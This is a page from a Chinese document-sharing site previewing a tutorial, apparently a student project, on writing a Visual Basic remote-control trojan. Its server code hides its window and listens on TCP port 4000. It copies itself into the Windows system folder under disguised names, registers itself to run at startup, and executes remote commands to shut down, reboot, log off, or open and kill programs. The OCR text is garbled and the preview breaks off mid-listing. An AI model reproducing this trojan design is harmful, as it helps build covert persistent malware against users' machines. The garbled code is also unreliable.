VB黑客代码分析

VB黑客代码分析

ID:44416939

大小:253.85 KB

页数:13页

时间:2019-10-21

VB黑客代码分析_第1页
VB黑客代码分析_第2页
VB黑客代码分析_第3页
VB黑客代码分析_第4页
VB黑客代码分析_第5页
资源描述:

《VB黑客代码分析》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、木次试验的软件设计部分,分为客户端和服务端两个部分的设计,设计过程中的详细代码以及分析过程如下:服务端的代码设计:首先,新建一工程,名为Server,新建一个窗体,Name为frmServer,在窗体中加入一个winsock控件,Name设为sckServer,协议设为默认的TCP/IP协议。接下来我们回来frmServer窗体模块中,添加如下代码:PrivateSubFORMLoad()WithMe.sckServer.LocalPort二4000'端口号.sckServer.Listen'开始监听Me.Hide'在背后运行DimsCurrentPathAsS

2、tring,sSystemDirAsStringsCurrentPath=App・Path&&App・EXEName&〃・exe〃sSystemDir=“C:windowssystem”OnErrorResumeNextFileCopysCurrentPath,sSystemDir&〃Systrsy.exe〃'复制文件成系统冃录下的Systrsy.exeOnErrorResumeNextFi1eCopysCurrentPath,sSystemDir&〃txtView.exe〃'复制文件成系统目录下的txtView.exeCallstartupGroup'

3、调用注册表启动函数CallWriteToTxt"调用写入注册表函数IfApp.PrevlnstanceThen'判断程序是否下在运行End'如果已经运行就退出EndIfEndWithEndSubPrivateSubsckServerCormectionRequest(ByVairequestIDAsLong)'接受客户端的连接请求WithMeIf・sckServer.StateOsckClosedThen・sckServer.Close.sckServer.Accept(requestID)"打开端口侦听端口的状态EndWithEndSub在frmServer中

4、添加sckServer的DataArrial事件,接收客户端的请求,并完成各种操作。PrivateSubsckServer_DataArrival(ByVaibytesTotalAsLong)DimstrDataAsStringWithMe.sckServer・GetDatastrDataSelectCasestrDataCase"Exit"'获取数据信息'根据具体的信息执行对应的操作Shell"shutdown-s-t0〃'实现关机Case"Reboot/Shell"shutdown-r一t0〃"实现重启'实现注销Case〃Logoff〃shell〃shutd

5、ownT—t0〃Shell"C:WIND0WSsystem32otepad.exe"Shell"C:WIND0WSsystein32calc.exe〃'打开记事木'打开计算器c〃Ci•〃CaseGuanbi'实现关闭Shell,ztaskkill/imnotepad・exe"Shellz,taskkill/imcalc・exe〃EndSelect'关闭记事木“关闭计算器EndWithEndSub把服务端加入到注册表的启动组中,让它一开机就自动运行回到Server工程中的modApi中加入如下API函数:PublicDeclareFunctionRe

6、gOpenKeyLib,zadvapi32・Alias"RegOpenKeyA"(ByVaihKeyAsLong,ByVaiIpSubKeyAsString,phkResultAsLong)AsLongPublicDeclareFunctionRegSetvalueExLibz/advapi32.dl1〃Alias"RegSetvalueExA"(ByVaihKeyAsLong,ByVailpvalueNameAsString,ByVaiReservedAsLong,ByVaidwTypeAsLong,lpDataAsAny,ByVaicbDataAsLong)

7、AsLongPublicDeclareFunctionRegCreateKeyLib,?advapi32・dll,zAlias,zRegCreateKeyA,/(ByVaihKeyAsLong,ByVaiIpSubKeyAsString,phkResultAsLong)AsLongPublicConstREG_BTNARY二3PublicConstREG_SZ二1PublicConstHKEY_LOCAL_MACHINE=&H80000002PublicConstHKEYCLASSESROOT=&H80000000写到注册表启动组中的过程。PublicSubSt

8、artupGroup()

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。